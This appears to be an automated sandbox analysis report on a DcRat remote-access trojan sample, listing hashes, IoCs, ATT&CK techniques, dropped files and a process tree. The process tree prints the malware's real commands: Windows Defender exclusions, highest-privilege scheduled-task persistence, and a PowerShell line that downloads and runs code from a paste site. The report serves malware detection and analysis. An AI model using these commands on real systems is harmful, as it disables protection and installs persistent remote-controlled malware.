dcrat | 5d397b2ae1f225f57933256265051b2629234b0068a9d3a0c16effa1afc120f9

Analysis

max time kernel
91s
max time network
94s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
08-01-2025 08:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0.exe
Size

3.6MB
MD5

2fb7a00fca82d7cc33df9747370ada41
SHA1

e15a485b27f8d43ecc624f018df5df4b54fe2781
SHA256

5d397b2ae1f225f57933256265051b2629234b0068a9d3a0c16effa1afc120f9
SHA512

e2b3d772dbeaa5b6faa17913b5a7dda356c0215d709a3492bb9bdd53c871cf595980083b33903161493b6bdfbbd384c1effefc4df966d245759ac85c04bbbb8a
SSDEEP

98304:j+yA1ZY+BmmQuY7QwgSq6AWZ17O8YwDeJv8wVqwIlj03S:j+j7DAcw7zYwD88w4hm

Score

10^/10

dcrat execution infostealer rat

Malware Config

Signatures

DcRat 27 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

description	ioc	pid	Process
		3468	schtasks.exe
		4820	schtasks.exe
		4152	schtasks.exe
		4304	schtasks.exe
		2336	schtasks.exe
		3060	schtasks.exe
		2132	schtasks.exe
		3776	schtasks.exe
		584	schtasks.exe
		4432	schtasks.exe
File created	C:\Program Files (x86)\Microsoft\EdgeWebView\27d1bcfc3c54e0		0.exe
		3148	schtasks.exe
		2184	schtasks.exe
		2420	schtasks.exe
		1328	schtasks.exe
		3436	schtasks.exe
		3080	schtasks.exe
		2620	schtasks.exe
		3208	schtasks.exe
		804	schtasks.exe
		4004	schtasks.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\0a1fd5f707cd16		0.exe
		3180	schtasks.exe
		3788	schtasks.exe
		4044	schtasks.exe
		3448	schtasks.exe
		4668	schtasks.exe

Dcrat family
dcrat

Process spawned unexpected child process 24 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4820	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4432	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	584	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3468	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2336	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1328	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4304	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3436	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3208	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4004	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3180	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2184	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4152	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3788	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	804	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3148	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3776	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3060	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2420	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3080	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4668	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2132	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4044	2492	schtasks.exe	77
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2620	2492	schtasks.exe	77

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral3/memory/4376-3-0x000000001C010000-0x000000001C110000-memory.dmp	dcrat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
2	1692	powershell.exe
4	1692	powershell.exe
5	1692	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1784	powershell.exe
1236	powershell.exe
1008	powershell.exe
5092	powershell.exe
3980	powershell.exe
1016	powershell.exe
1132	powershell.exe
4060	powershell.exe
3040	powershell.exe
4116	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
4332	dllhost.exe
4440	svchost.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\sppsvc.exe	0.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\0a1fd5f707cd16	0.exe
File created	C:\Program Files (x86)\Microsoft\EdgeWebView\System.exe	0.exe
File created	C:\Program Files (x86)\Microsoft\EdgeWebView\27d1bcfc3c54e0	0.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 25 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3436	schtasks.exe
3180	schtasks.exe
3148	schtasks.exe
4044	schtasks.exe
4432	schtasks.exe
584	schtasks.exe
1328	schtasks.exe
3060	schtasks.exe
4668	schtasks.exe
2620	schtasks.exe
3208	schtasks.exe
2184	schtasks.exe
3788	schtasks.exe
4152	schtasks.exe
3776	schtasks.exe
2420	schtasks.exe
3080	schtasks.exe
3448	schtasks.exe
3468	schtasks.exe
4304	schtasks.exe
4004	schtasks.exe
2132	schtasks.exe
4820	schtasks.exe
2336	schtasks.exe
804	schtasks.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
4376	0.exe
4376	0.exe
4376	0.exe
4376	0.exe
4376	0.exe
4376	0.exe
4376	0.exe
4376	0.exe
4376	0.exe
4376	0.exe
4376	0.exe
3980	powershell.exe
4116	powershell.exe
4060	powershell.exe
1236	powershell.exe
1784	powershell.exe
5092	powershell.exe
3040	powershell.exe
1132	powershell.exe
1008	powershell.exe
5092	powershell.exe
4116	powershell.exe
4332	dllhost.exe
1132	powershell.exe
1784	powershell.exe
3980	powershell.exe
1008	powershell.exe
4060	powershell.exe
1236	powershell.exe
3040	powershell.exe
1016	powershell.exe
1016	powershell.exe
1692	powershell.exe
1692	powershell.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeDebugPrivilege	4376	0.exe
Token: SeDebugPrivilege	1132	powershell.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	4116	powershell.exe
Token: SeDebugPrivilege	4060	powershell.exe
Token: SeDebugPrivilege	1236	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeDebugPrivilege	1008	powershell.exe
Token: SeDebugPrivilege	4332	dllhost.exe
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeDebugPrivilege	1016	powershell.exe
Token: SeDebugPrivilege	4440	svchost.exe
Token: SeDebugPrivilege	1692	powershell.exe

Suspicious use of WriteProcessMemory 38 IoCs

description	pid	Process	procid_target
PID 4376 wrote to memory of 1132	4376	0.exe	102
PID 4376 wrote to memory of 1132	4376	0.exe	102
PID 4376 wrote to memory of 1784	4376	0.exe	103
PID 4376 wrote to memory of 1784	4376	0.exe	103
PID 4376 wrote to memory of 4060	4376	0.exe	104
PID 4376 wrote to memory of 4060	4376	0.exe	104
PID 4376 wrote to memory of 5092	4376	0.exe	105
PID 4376 wrote to memory of 5092	4376	0.exe	105
PID 4376 wrote to memory of 1008	4376	0.exe	106
PID 4376 wrote to memory of 1008	4376	0.exe	106
PID 4376 wrote to memory of 1236	4376	0.exe	107
PID 4376 wrote to memory of 1236	4376	0.exe	107
PID 4376 wrote to memory of 3980	4376	0.exe	109
PID 4376 wrote to memory of 3980	4376	0.exe	109
PID 4376 wrote to memory of 4116	4376	0.exe	111
PID 4376 wrote to memory of 4116	4376	0.exe	111
PID 4376 wrote to memory of 3040	4376	0.exe	112
PID 4376 wrote to memory of 3040	4376	0.exe	112
PID 4376 wrote to memory of 4332	4376	0.exe	120
PID 4376 wrote to memory of 4332	4376	0.exe	120
PID 4332 wrote to memory of 1016	4332	dllhost.exe	121
PID 4332 wrote to memory of 1016	4332	dllhost.exe	121
PID 4332 wrote to memory of 3448	4332	dllhost.exe	123
PID 4332 wrote to memory of 3448	4332	dllhost.exe	123
PID 4332 wrote to memory of 4440	4332	dllhost.exe	125
PID 4332 wrote to memory of 4440	4332	dllhost.exe	125
PID 4440 wrote to memory of 3148	4440	svchost.exe	126
PID 4440 wrote to memory of 3148	4440	svchost.exe	126
PID 3148 wrote to memory of 1692	3148	cmd.exe	128
PID 3148 wrote to memory of 1692	3148	cmd.exe	128
PID 1692 wrote to memory of 3584	1692	powershell.exe	129
PID 1692 wrote to memory of 3584	1692	powershell.exe	129
PID 3584 wrote to memory of 2824	3584	cmd.exe	131
PID 3584 wrote to memory of 2824	3584	cmd.exe	131
PID 3584 wrote to memory of 1904	3584	cmd.exe	132
PID 3584 wrote to memory of 1904	3584	cmd.exe	132
PID 3584 wrote to memory of 3480	3584	cmd.exe	133
PID 3584 wrote to memory of 3480	3584	cmd.exe	133

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\0.exe
"C:\Users\Admin\AppData\Local\Temp\0.exe"
1⤵
- DcRat
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\0.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\spoolsv.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dllhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\sppsvc.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dwm.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dllhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1236
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\fontdrvhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Package Cache\dllhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft\EdgeWebView\System.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3040
- C:\Recovery\WindowsRE\dllhost.exe
  "C:\Recovery\WindowsRE\dllhost.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4332
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\grabber\svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1016
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "svchost" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\grabber\svchost.exe" /RL HIGHEST
    3⤵
    - DcRat
    - Scheduled Task/Job: Scheduled Task
    PID:3448
- - C:\Users\Admin\AppData\Roaming\grabber\svchost.exe
    "C:\Users\Admin\AppData\Roaming\grabber\svchost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4440
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3148
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
        5⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1692
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\runtime.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3584
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "echo" "C:\Users\Admin\AppData\Roaming\runtime.bat"
        7⤵
        
        PID:2824
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo \\DADDYSERVER "
        7⤵
        
        PID:1904
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "DADDYSERVER"
        7⤵
        
        PID:3480

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4820

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1328

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\sppsvc.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\sppsvc.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Users\Public\fontdrvhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3148

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Public\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Users\Public\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Package Cache\dllhost.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2420

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\All Users\Package Cache\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Package Cache\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4668

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft\EdgeWebView\System.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\EdgeWebView\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2620

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft\EdgeWebView\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Recovery\WindowsRE\dllhost.exe

Filesize
3.6MB

MD5
2fb7a00fca82d7cc33df9747370ada41

SHA1
e15a485b27f8d43ecc624f018df5df4b54fe2781

SHA256
5d397b2ae1f225f57933256265051b2629234b0068a9d3a0c16effa1afc120f9

SHA512
e2b3d772dbeaa5b6faa17913b5a7dda356c0215d709a3492bb9bdd53c871cf595980083b33903161493b6bdfbbd384c1effefc4df966d245759ac85c04bbbb8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6903d57eed54e89b68ebb957928d1b99

SHA1
fade011fbf2e4bc044d41e380cf70bd6a9f73212

SHA256
36cbb00b016c9f97645fb628ef72b524dfbdf6e08d626e5c837bbbb9075dcb52

SHA512
c192ea9810fd22de8378269235c1035aa1fe1975a53c876fe4a7acc726c020f94773c21e4e4771133f9fcedb0209f0a5324c594c1db5b28fe1b27644db4fdc9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
7d760ca2472bcb9fe9310090d91318ce

SHA1
cb316b8560b38ea16a17626e685d5a501cd31c4a

SHA256
5c362b53c4a4578d8b57c51e1eac15f7f3b2447e43e0dad5102ecd003d5b41d4

SHA512
141e8661d7348ebbc1f74f828df956a0c6e4cdb70f3b9d52623c9a30993bfd91da9ed7d8d284b84f173d3e6f47c876fb4a8295110895f44d97fd6cc4c5659c35

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e8eb51096d6f6781456fef7df731d97

SHA1
ec2aaf851a618fb43c3d040a13a71997c25bda43

SHA256
96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

SHA512
0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
dc4dd6766dd68388d8733f1b729f87e9

SHA1
7b883d87afec5be3eff2088409cd1f57f877c756

SHA256
3407d8ad0c68a148aef81c7f124849573ac02097acd15f9bbe80f86e0498e826

SHA512
3084c1b7bb0fd998cddb8c917bac87f163a0f134a420158db4f354cb81ec1d5d65d3bac1d9b3e11b0a6707deacece47f819b1ed55ddf2b1d287fbdb244bf65a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
13f220b32225fc4bdc00160f199d264a

SHA1
b1e1b31ec6b2d1f22793b3490eb905252d6a6f1a

SHA256
69cbec7c741e79dbbf1c8ab1046eb8edd0585f7ad56432e9a341114ec51b4c2a

SHA512
f7a0074ff42f81c4eac7815c16b29a902ac933e8367698678e05582d6b6d237a20f1b282451d4112085e4479e179cb54960831d459c91109168363cb9276c782

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_it03ahvl.4sz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kdotFyooc.bat

Filesize
171B

MD5
e733285e71b4a9f5b4d8621db7df6982

SHA1
a7a315bd04e7115a3e7a488c1faee47480281f47

SHA256
31aa232fe84f449546d9e24f048098a33e7319e361eb9e7d2fec542612a26c46

SHA512
d39d21d62ede4d13aa0544ecacdd48ecc94755ed713eca490b6bd6e3d6961c61cb7873ed382716bf5178eba7139366e8ea6deb84ad2fde0630b98f78578a46ba

Download Submit
C:\Users\Admin\AppData\Roaming\grabber\svchost.exe

Filesize
4KB

MD5
3abc237a050e33baa885be13427e9ed3

SHA1
924ca9d38466f8da7dfec49b55e92805d67dd811

SHA256
6f8af6cb9289ac92ac1de99bdcdd3a9a964713e916c85697f10f2cbc0c5daea1

SHA512
3b6a9ada854cf59023e45d2fc41e91781cda5caff7141ee8ad927d7bd3f9c6410d55059eaacd0dd3a3c799cd3f86c876767f506528f67b17f3e2ab9290c9fb09

Download Submit
C:\Users\Admin\AppData\Roaming\runtime.bat

Filesize
104KB

MD5
8158350247e35657cbccf5054d8a6d33

SHA1
b2cbd3a164a21d168b281a43646a08f4717539af

SHA256
8d4934d75e3a578b2e836507ae1fd02fa67e33c79f5a784c2ead91fecc2fb8f0

SHA512
f772a497baaf2f73b4fa2565abc7e536ce1d505c51271646532662d89f1ee34ad593ffaebc99d67f343e4973268efea7b8bf6cd9f274c4266278fc0e71b04aff

Download Submit
memory/1132-36-0x000002447ED60000-0x000002447ED82000-memory.dmp

Filesize
136KB

Download
memory/1692-160-0x000001B02FAB0000-0x000001B030256000-memory.dmp

Filesize
7.6MB

Download
memory/4332-137-0x000000001CC60000-0x000000001CC66000-memory.dmp

Filesize
24KB

Download
memory/4332-136-0x000000001CC50000-0x000000001CC56000-memory.dmp

Filesize
24KB

Download
memory/4376-35-0x00007FF8E89D0000-0x00007FF8E9492000-memory.dmp

Filesize
10.8MB

Download
memory/4376-7-0x0000000003620000-0x000000000362C000-memory.dmp

Filesize
48KB

Download
memory/4376-6-0x00000000035A0000-0x00000000035AE000-memory.dmp

Filesize
56KB

Download
memory/4376-0-0x00007FF8E89D3000-0x00007FF8E89D5000-memory.dmp

Filesize
8KB

Download
memory/4376-5-0x00000000033E0000-0x00000000033EC000-memory.dmp

Filesize
48KB

Download
memory/4376-3-0x000000001C010000-0x000000001C110000-memory.dmp

Filesize
1024KB

Download
memory/4376-4-0x00007FF8E89D0000-0x00007FF8E9492000-memory.dmp

Filesize
10.8MB

Download
